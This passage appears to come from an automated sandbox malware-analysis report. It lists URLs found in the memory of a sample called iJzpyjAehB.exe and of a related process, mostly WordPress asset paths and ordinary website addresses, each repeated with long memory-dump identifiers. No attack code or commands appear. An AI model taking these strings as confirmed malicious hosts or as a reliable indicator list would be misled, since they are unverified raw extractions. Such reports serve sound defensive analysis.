00000000.00000003.297246492.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.294223177.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.293737431.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.302597912.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.311024379.0000000003180000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296882076.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297881797.00000000031D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.316183261.0000000003480000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297579920.0000000003090000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292770939.0000000008C00000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.295151770.00000000035D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-includes/js/dist/vendor/wp-polyfill.min.js?ver=3.15.0
                      Source: iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296772064.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297118541.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297246492.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.294223177.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.293737431.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.302597912.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.311024379.0000000003180000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296882076.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297881797.00000000031D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.316183261.0000000003480000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297579920.0000000003090000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292770939.0000000008C00000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.295151770.00000000035D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2
                      Source: iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296772064.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297118541.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297246492.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.294223177.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.293737431.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.302597912.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.311024379.0000000003180000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296882076.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297881797.00000000031D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.316183261.0000000003480000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297579920.0000000003090000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292770939.0000000008C00000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.295151770.00000000035D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-includes/js/jquery/jquery.min.js?ver=3.6.0
                      Source: iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296772064.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297118541.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297246492.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.294223177.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.293737431.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.302597912.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.311024379.0000000003180000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296882076.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297881797.00000000031D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.316183261.0000000003480000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297579920.0000000003090000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292770939.0000000008C00000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.295151770.00000000035D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-includes/wlwmanifest.xml
                      Source: iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296772064.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297118541.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297246492.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.294223177.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.293737431.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.302597912.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.311024379.0000000003180000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296882076.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297881797.00000000031D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.316183261.0000000003480000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297579920.0000000003090000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292770939.0000000008C00000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.295151770.00000000035D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-json/
                      Source: iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296772064.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297118541.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297246492.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.294223177.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.293737431.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.302597912.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.311024379.0000000003180000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296882076.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297881797.00000000031D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.316183261.0000000003480000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297579920.0000000003090000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292770939.0000000008C00000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.295151770.00000000035D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/xmlrpc.php?rsd
                      Source: iJzpyjAehB.exe, 00000000.00000002.603177646.00000000075B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.vazir.se/V
                      Source: iJzpyjAehB.exe, 00000000.00000002.603177646.00000000075B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.vitaindu.com/
                      Source: iJzpyjAehB.exe, 00000000.00000003.347514573.0000000007578000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.waldi.pl/
                      Source: iJzpyjAehB.exe, 00000000.00000003.347514573.0000000007564000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.wifi4all.nl/
                      Source: iJzpyjAehB.exe, 00000000.00000003.347514573.0000000007564000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.wifi4all.nl/L
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.302597912.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.311024379.0000000003180000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000002.596543130.0000000003910000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.467548512.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.440284917.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.316183261.0000000003480000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.460052279.0000000000A40000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438940303.0000000003090000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.winhui.cn/template/default/img/fixedimg1.png
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.302597912.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.311024379.0000000003180000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000002.596543130.0000000003910000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.467548512.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.440284917.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.316183261.0000000003480000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.460052279.0000000000A40000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438940303.0000000003090000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.winhui.cn/template/default/img/fixedimg3.png
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.302597912.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.311024379.0000000003180000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000002.596543130.0000000003910000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.467548512.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.440284917.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.316183261.0000000003480000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.460052279.0000000000A40000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438940303.0000000003090000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.winhui.cn/template/default/img/fixedimg4.png
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.302597912.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.311024379.0000000003180000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000002.596543130.0000000003910000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.467548512.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.440284917.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.316183261.0000000003480000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.460052279.0000000000A40000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438940303.0000000003090000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.winhui.cn/template/default/img/fixedimg6.png
                      Source: pigalicapi.exe, 00000006.00000003.338019640.0000000007540000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.wkhk.net/
                      Source: iJzpyjAehB.exe, 00000000.00000002.601365674.0000000005EAD000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.wnsavoy.com
                      Source: iJzpyjAehB.exe, 00000000.00000003.347142690.00000000075B7000.00000004.00000020.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347142690.00000000075CA000.00000004.00000020.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000002.603177646.00000000075B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.wnsavoy.com/
                      Source: iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.wyjzradio.com
                      Source: iJzpyjAehB.exe, 00000000.00000003.347514573.0000000007564000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.x0c.com/
                      Source: iJzpyjAehB.exe, 00000000.00000003.347514573.0000000007564000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.x0c.com/c
                      Source: iJzpyjAehB.exe, 00000000.00000003.347514573.0000000007564000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.xaicom.es/
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.429302770.0000000008B00000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.436653718.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438316131.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.435832282.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.435550642.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000002.596543130.0000000003910000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434048283.0000000005050000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.431188888.0000000005050000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.467548512.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.429996077.0000000005580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.440284917.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.431935732.0000000005050000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.460052279.0000000000A40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.xjgc.com
                      Source: iJzpyjAehB.exe, 00000000.00000003.347142690.00000000075CA000.00000004.00000020.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000002.603177646.00000000075B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.yoruksut.com/
                      Source: iJzpyjAehB.exe, 00000000.00000002.603177646.00000000075B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.yumgiskor.kz/
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.300368242.0000000004C10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.439075116.0000000008E00000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.302597912.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.311024379.0000000003180000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000002.596543130.0000000003910000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.467548512.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.440284917.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.316183261.0000000003480000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.460052279.0000000000A40000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://ajax.googleapis.com/ajax/libs/prototype/1.7.1.0/prototype.js?ver=1.7.1
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.300368242.0000000004C10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.439075116.0000000008E00000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.302597912.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.311024379.0000000003180000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000002.596543130.0000000003910000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.467548512.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.440284917.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.316183261.0000000003480000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.460052279.0000000000A40000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://ajax.googleapis.com/ajax/libs/scriptaculous/1.9.0/effects.js?ver=1.9.0
